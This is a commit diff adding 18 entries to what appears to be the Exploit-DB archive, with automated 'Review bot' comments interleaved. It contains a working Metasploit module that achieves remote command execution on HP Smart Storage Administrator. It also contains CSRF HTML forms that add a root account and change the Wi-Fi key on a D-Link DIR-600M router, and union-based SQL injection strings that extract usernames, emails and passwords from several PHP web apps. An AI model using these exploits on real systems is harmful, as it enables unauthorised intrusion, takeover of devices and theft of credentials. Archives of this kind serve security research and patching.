DB: 2017-02-11
18 new exploits Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit) F5 BIG-IP SSL Virtual Server - Memory Disclosure CMS Lite 1.3.1 - SQL Injection Tiger Post 3.0.1 - SQL Injection Gram Post 1.0 - SQL Injection Youtube Analytics Multi Channel 3.0 - SQL Injection Collabo - Arbitrary File Download Takas Classified 1.1 - SQL Injection Zigaform - SQL Injection Multilanguage Estate Agency Pro 1.2 - SQL Injection QWIKIA 1.1.1 - SQL Injection Automated Job Portal Script - SQL Injection CLUB-8 EMS - SQL Injection Uploadr - SQL Injection CodePaul ClipMass - SQL Injection Video Subscription - SQL Injection D-link DIR-600M - Cross-Site Request Forgery HotelCMS with Booking Engine - SQL Injection
parent
a6133048b5
commit
dcc7720ad6
19 changed files with 586 additions and 1 deletions
20
files.csv
20
files.csv
|
@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
|
|||
39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
|
||||
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
|
||||
39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
|
||||
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
|
||||
|
@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
|
|||
41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
|
||||
41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
|
||||
41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
|
||||
41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
|
||||
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
|
|||
41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
|
||||
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
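--- a/platforms/hardware/remote/41298.txt
+++ b/platforms/hardware/remote/41298.txt
@@ -0,0 +1,12 @@
+/*
+# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
+# Date: [10.02.2017]
+# Exploit Author: [Ege Balcı]
+# Vendor Homepage: [https://f5.com/]
+# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
+# Tested on: [Multiple]
+# CVE : [CVE-2016-9244]
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip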
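Review bot: The only PoC content in this file is a link to a binary archive (`41298.zip`) held in a separate repository, and no checksum is recorded next to it, so a reader cannot verify that the archive they fetch is the one that was catalogued. A digest line under the URL would fix that, for example `# SHA256: <sha256-of-41298.zip>` (placeholder, to be computed from the published archive). The header also opens a `/*` comment on the first line that is never closed; it should be closed after the `CVE` line or dropped. For defenders the actionable facts are already in the header: the affected ranges are given as 12.0.0 - 12.1.2 and 11.4.0 - 11.6.1 and the issue is tracked as CVE-2016-9244.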
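--- a/platforms/hardware/webapps/41299.html
+++ b/platforms/hardware/webapps/41299.html
@@ -0,0 +1,92 @@
+# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
+# Google Dork:N/A
+# Date: 07/02/2017
+# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
+# Vendor Homepage:dlink.com
+# Software Link:N/A
+# Version:Hardware version: C1
+Firmware version: 3.03
+# Tested on:All Platforms
+# CVE :CVE-2017-5874
+
+Abstract:
+=======
+
+Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
+to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+
+
+Exploitation-Technique:
+===================
+Remote
+
+Severity Rating:
+===================
+
+7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
+
+Details:
+=======
+An attacker who lures a DIR-600M authenticated user to browse a malicious website
+can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
+
+Proof Of Concept code:
+====================
+
+1. Add new user with root access
+
+<html>
+<!-- CSRF PoC - by Ajay Kulal -->
+<body>
+<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
+<input type="hidden" name="username" value="AK" />
+<input type="hidden" name="privilege" value="2" />
+<input type="hidden" name="newpass" value="dolphin" />
+<input type="hidden" name="confpass" value="dolphin" />
+<input type="hidden" name="adduser" value="Add" />
+<input type="hidden" name="hiddenpass" value="" />
+<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+
+
+2. changing wireless password
+
+<html>
+<!-- CSRF PoC - by Ajay Kulal -->
+<body>
+<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
+<input type="hidden" name="domain" value="1" />
+<input type="hidden" name="hiddenSSID" value="on" />
+<input type="hidden" name="ssid" value="Dravidian" />
+<input type="hidden" name="band" value="10" />
+<input type="hidden" name="chan" value="0" />
+<input type="hidden" name="chanwid" value="1" />
+<input type="hidden" name="txRate" value="0" />
+<input type="hidden" name="method_cur" value="0" />
+<input type="hidden" name="method" value="2" />
+<input type="hidden" name="authType" value="2" />
+<input type="hidden" name="length" value="1" />
+<input type="hidden" name="format" value="2" />
+<input type="hidden" name="defaultTxKeyId" value="1" />
+<input type="hidden" name="key1" value="0000000000" />
+<input type="hidden" name="pskFormat" value="0" />
+<input type="hidden" name="pskValue" value="password123" />
+<input type="hidden" name="checkWPS2" value="1" />
+<input type="hidden" name="save" value="Apply" />
+<input type="hidden" name="basicrates" value="15" />
+<input type="hidden" name="operrates" value="4095" />
+<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+
+
+
+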
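Review bot: The advisory labels the technique `Remote` while the CVSS vector it gives is `AV:A` (adjacent network), and the two disagree; the header should state which is intended, because it changes how exposed a deployment is judged to be. The text also ends at the PoC with no remediation section. Judging only from the two forms, `form2userconfig.cgi` and `form2WlanBasicSetup.cgi` appear to accept state-changing POSTs with no per-session token, so a short "Mitigation" paragraph (a fixed firmware if one exists, logging out of the admin UI, not browsing other sites while logged in to the router) would make the entry usable by defenders. The file is stored as `.html` but starts with plain-text header lines and holds two separate `<html>` documents, so it is not a well-formed page; wrapping the advisory text in an HTML comment or saving it as `.txt` would be cleaner.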
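--- a/platforms/multiple/remote/41297.rb
+++ b/platforms/multiple/remote/41297.rb
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::CmdStager
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "HP Smart Storage Administrator Remote Command Injection",
+'Description' => %q{
+This module exploits a vulnerability found in HP Smart Storage Administrator. By
+supplying a specially crafted HTTP request, it is possible to control the
+'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
+which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
+],
+'References' =>
+[
+['CVE', '2016-8523']
+],
+'DefaultOptions' =>
+{
+'SSL' => true
+},
+'Platform' => %w{ linux win },
+'Targets' =>
+[
+['Linux', {
+'Platform' => 'linux',
+'Arch' => ARCH_X86,
+'CmdStagerFlavor' => 'bourne'
+}],
+['Linux (x64)', {
+'Platform' => 'linux',
+'Arch' => ARCH_X86_64,
+'CmdStagerFlavor' => 'bourne'
+}],
+['Windows', {
+'Platform' => 'win',
+'Arch' => ARCH_X86,
+'CmdStagerFlavor' => 'certutil'
+}],
+['Windows (x64)', {
+'Platform' => 'win',
+'Arch' => ARCH_X86_64,
+'CmdStagerFlavor' => 'certutil'
+}],
+],
+'Privileged' => false,
+'DisclosureDate' => "Jan 30 2017"
+))
+
+register_options(
+[
+Opt::RPORT(2381),
+# USERNAME/PASS may not be necessary, because the anonymous access is possible
+OptString.new("USERNAME", [false, 'The username to authenticate as']),
+OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+], self.class)
+end
+
+def check
+
+@cookie = ''
+
+sig = Rex::Text.rand_text_alpha(8)
+cmd = "&echo%20#{sig}&echo"
+res = send_command(cmd, true)
+if not res
+vprint_error("#{peer} - Connection timed out")
+return Exploit::CheckCode::Unknown
+end
+
+if res.code == 200 && res.headers.to_s() =~ /#{sig}/
+return Exploit::CheckCode::Vulnerable
+end
+
+Exploit::CheckCode::Safe
+end
+
+
+def login
+username = datastore['USERNAME']
+password = datastore['PASSWORD']
+
+cookie = ''
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => '/proxy/ssllogin',
+'vars_post' => {
+'redirecturl' => '',
+'redirectquerystring' => '',
+'user' => username,
+'password' => password
+}
+})
+
+if not res
+fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
+end
+
+# CpqElm-Login: success
+if res.headers['CpqElm-Login'].to_s =~ /success/
+cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+end
+
+cookie
+end
+
+
+def setup_stager
+execute_cmdstager(:temp => './', :linemax => 2800)
+end
+
+
+def execute_command(cmd, opts={})
+res = send_command(cmd, false)
+if res && res.code != 200
+vprint_error("Unexpected response:\n#{res}")
+fail_with(Failure::Unknown, "There was an unexpected response")
+end
+end
+
+
+def send_command(cmd, check)
+if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
+@cookie = login
+if @cookie.empty?
+fail_with(Failure::NoAccess, "#{peer} - Login failed")
+else
+print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+end
+end
+
+req_opts = {}
+
+# For the check() function, use GET method
+if check
+req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
+req_opts['method'] = "GET"
+else
+req_opts['uri'] = "/HPSSA/index.htm"
+req_opts['method'] = "POST"
+req_opts['vars_post'] = {'msf'=>'red'}
+case target.opts['Platform']
+when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
+when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
+end
+end
+
+unless @cookie.empty?
+browser_chk = 'HPSMH-browser-check=done for this session'
+curl_loc = "curlocation-#{datastore['USERNAME']}="
+req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+end
+
+send_request_cgi(req_opts)
+end
+
+def exploit
+@cookie = ''
+
+setup_stager
+end
+end
+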
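Review bot: `check` is an active test rather than a version fingerprint, and nothing in the module says so: it sends an injected `echo` of a random marker through `send_command(cmd, true)` and returns `Vulnerable` only when the marker appears in the response headers, so a command runs on the target during the check. A comment above `def check` such as `# Active check: injects an echo of a random marker and looks for it in the response headers; this runs a command on the target.` would make that explicit for anyone using it in an authorised assessment. `send_command` is also undocumented although it builds two different request shapes, and its `gsub` of `./` silently depends on `:temp => './'` in `setup_stager`; a short header comment naming both would help the next reader. The `References` list carries only the CVE id, so a link to the vendor advisory that gives 2.60.18.0 as the fixed version (the figure quoted in `Description`) is worth adding for defenders who need to confirm patch status.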
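--- a/platforms/php/webapps/41290.txt
+++ b/platforms/php/webapps/41290.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.cmslite.co.uk/
+# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
+# Demo: http://www.cmslite.co.uk/
+# Version: 1.3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?Style=[SQL]
+# Etc...
+# # # # #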
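--- a/platforms/php/webapps/41291.txt
+++ b/platforms/php/webapps/41291.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
+# Demo: http://demo.vtcreators.com/tigerpost/
+# Version: 3.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
+# Etc...
+# # # # #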
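--- a/platforms/php/webapps/41292.txt
+++ b/platforms/php/webapps/41292.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
+# Demo: http://demo.vtcreators.com/grampost/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
+# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
+# Etc...
+# # # # #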
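--- a/platforms/php/webapps/41293.txt
+++ b/platforms/php/webapps/41293.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
+# Demo: http://demo.vtcreators.com/yamc/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# Etc...
+# # # # #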
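--- a/platforms/php/webapps/41294.txt
+++ b/platforms/php/webapps/41294.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://321-internet.com/
+# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
+# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# Login as regular user
+# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
+# Etc...
+# # # # #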
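--- a/platforms/php/webapps/41295.txt
+++ b/platforms/php/webapps/41295.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Takas Classified – Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://artifectx.com/
+# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
+# Demo: http://takas.artifectx.com/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
+# Etc... Etc...
+# # # # #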
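--- a/platforms/php/webapps/41296.txt
+++ b/platforms/php/webapps/41296.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://php-form-builder.zigaform.com/
+# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
+# Demo: http://demo-phpformbuilder.zigaform.com/index.php
+# Version: 2.9.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
+# Etc...
+# # # # #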
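--- a/platforms/php/webapps/41300.txt
+++ b/platforms/php/webapps/41300.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://djrust26.hu/
+# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
+# Demo: http://djrust26.hu/realestate/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property_show.php?id=[SQL]
+# # # # #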
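--- a/platforms/php/webapps/41301.txt
+++ b/platforms/php/webapps/41301.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://xandr.co/
+# Software Buy: http://xandr.co/portfolio/qwikia
+# Demo: http://qwikia.xandr.co/
+# Version: 1.1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?q=[SQL]
+# # # # #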
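--- a/platforms/php/webapps/41302.txt
+++ b/platforms/php/webapps/41302.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Automated Job Portal Script - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.jagaad.com/
+# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
+# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/jobdetail.php?id=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+#
+# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+#
+# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -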
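--- a/platforms/php/webapps/41303.txt
+++ b/platforms/php/webapps/41303.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://rexbd.net/
+# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
+# Demo: http://ems.rexbd.net/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as sales man user
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
+#
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
+# # # # #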
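--- a/platforms/php/webapps/41304.txt
+++ b/platforms/php/webapps/41304.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Uploadr - Project Files Management - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://lagunaproperty.com/
+# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
+# Demo: http://download.lagunaproperty.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# http://localhost/[PATH]/download?file=[SQL]
+# # # # #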
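--- a/platforms/php/webapps/41305.txt
+++ b/platforms/php/webapps/41305.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
+# Demo: http://codepaul.com/clipmass/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #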
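--- a/platforms/php/webapps/41306.txt
+++ b/platforms/php/webapps/41306.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: TV - Video Subscription - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
+# Demo: http://codepaul.com/tv/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# # # # #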
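--- a/platforms/php/webapps/41307.txt
+++ b/platforms/php/webapps/41307.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: HotelCMS with Booking Engine - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://codepaul.com/
+# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
+# Demo: http://codepaul.com/hotelcms/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/locale?locale=[SQL]
+# # # # #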